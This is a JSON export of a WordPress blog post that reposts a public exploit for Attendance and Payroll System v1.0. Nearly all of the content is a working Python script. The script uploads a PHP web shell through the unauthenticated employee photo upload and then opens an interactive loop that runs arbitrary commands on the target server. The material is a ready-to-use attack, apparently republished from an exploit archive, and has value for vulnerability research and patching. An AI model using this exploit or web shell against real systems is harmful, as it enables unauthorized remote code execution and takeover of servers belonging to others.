{"id":21387,"date":"2022-03-07T19:49:05","date_gmt":"2022-03-07T16:49:05","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/166223\/aps10-exec.txt"},"modified":"2022-03-08T09:04:48","modified_gmt":"2022-03-08T05:34:48","slug":"attendance-and-payroll-system-1-0-remote-code-execution","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/attendance-and-payroll-system-1-0-remote-code-execution\/","title":{"rendered":"Attendance And Payroll System 1.0 Remote Code Execution"},"content":{"rendered":"

# Exploit Title: Attendance and Payroll System v1.0 – Remote Code Execution (RCE)
\n# Date: 04\/03\/2022
\n# Exploit Author: pr0z
\n# Vendor Homepage: https:\/\/www.sourcecodester.com
\n# Software Link: https:\/\/www.sourcecodester.com\/sites\/default\/files\/download\/oretnom23\/apsystem.zip
\n# Version: v1.0
\n# Tested on: Linux, MySQL, Apache<\/p>\n

import requests
\nimport sys
\nfrom requests.exceptions import ConnectionError<\/p>\n

# Interface class to display terminal messages
\nclass Interface():
\ndef __init__(self):
\nself.red = ‘\\033[91m’
\nself.green = ‘\\033[92m’
\nself.white = ‘\\033[37m’
\nself.yellow = ‘\\033[93m’
\nself.bold = ‘\\033[1m’
\nself.end = ‘\\033[0m’<\/p>\n

def header(self):
\nprint(‘\\n >> Attendance and Payroll System v1.0’)
\nprint(‘ >> Unauthenticated Remote Code Execution’)
\nprint(‘ >> By pr0z\\n’)<\/p>\n

def info(self, message):
\nprint(f”[{self.white}*{self.end}] {message}”)<\/p>\n

def warning(self, message):
\nprint(f”[{self.yellow}!{self.end}] {message}”)<\/p>\n

def error(self, message):
\nprint(f”[{self.red}x{self.end}] {message}”)<\/p>\n

def success(self, message):
\nprint(f”[{self.green}\u2713{self.end}] {self.bold}{message}{self.end}”)<\/p>\n

upload_path = ‘\/apsystem\/admin\/employee_edit_photo.php’
\nshell_path = ‘\/apsystem\/images\/shell.php’
\n#proxies = {‘http’: ‘http:\/\/127.0.0.1:8080’, ‘https’: ‘http:\/\/127.0.0.1:8080’}<\/p>\n

shell_data = “<?php if(isset($_REQUEST[‘cmd’])){ $cmd = ($_REQUEST[‘cmd’]); system($cmd);}?>”<\/p>\n

multipart_form_data = {
\n‘id’: 1,
\n‘upload’: (”),
\n}<\/p>\n

files = {‘photo’: (‘shell.php’, shell_data)}<\/p>\n

output = Interface()
\noutput.header()<\/p>\n

# Check for arguments
\nif len(sys.argv) < 2 or ‘-h’ in sys.argv:
\noutput.info(“Usage: python3 rce.py http:\/\/127.0.0.1”)
\nsys.exit()<\/p>\n

# Upload the shell
\ntarget = sys.argv[1]\noutput.info(f”Uploading the web shell to {target}”)
\nr = requests.post(target + upload_path, files=files, data=multipart_form_data, verify=False)<\/p>\n

# Validating shell has been uploaded
\noutput.info(f”Validating the shell has been uploaded to {target}”)
\nr = requests.get(target + shell_path, verify=False)
\ntry:
\nr = requests.get(target + shell_path)
\nif r.status_code == 200:
\noutput.success(‘Successfully connected to web shell\\n’)
\nelse:
\nraise Exception
\nexcept ConnectionError:
\noutput.error(‘We were unable to establish a connection’)
\nsys.exit()
\nexcept:
\noutput.error(‘Something unexpected happened’)
\nsys.exit()<\/p>\n

# Remote code execution
\nwhile True:
\ntry:
\ncmd = input(“\\033[91mRCE\\033[0m > “)
\nif cmd == ‘exit’:
\nraise KeyboardInterrupt
\nr = requests.get(target + shell_path + “?cmd=” + cmd, verify=False)
\nif r.status_code == 200:
\nprint(r.text)
\nelse:
\nraise Exception
\nexcept KeyboardInterrupt:
\nsys.exit()
\nexcept ConnectionError:
\noutput.error(‘We lost our connection to the web shell’)
\nsys.exit()
\nexcept:
\noutput.error(‘Something unexpected happened’)
\nsys.exit()<\/p>\n","protected":false},"excerpt":{"rendered":"

# Exploit Title: Attendance and Payroll System v1.0 – Remote Code Execution (RCE) # Date: 04\/03\/2022 # Exploit Author: pr0z # Vendor Homepage: https:\/\/www.sourcecodester.com # Software Link: https:\/\/www.sourcecodester.com\/sites\/default\/files\/download\/oretnom23\/apsystem.zip # Version: v1.0 # Tested on: Linux, MySQL, Apache import requests import sys from requests.exceptions import ConnectionError # Interface class to display terminal messages class Interface(): def …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-21387","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/21387","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=21387"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/21387\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=21387"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=21387"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=21387"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}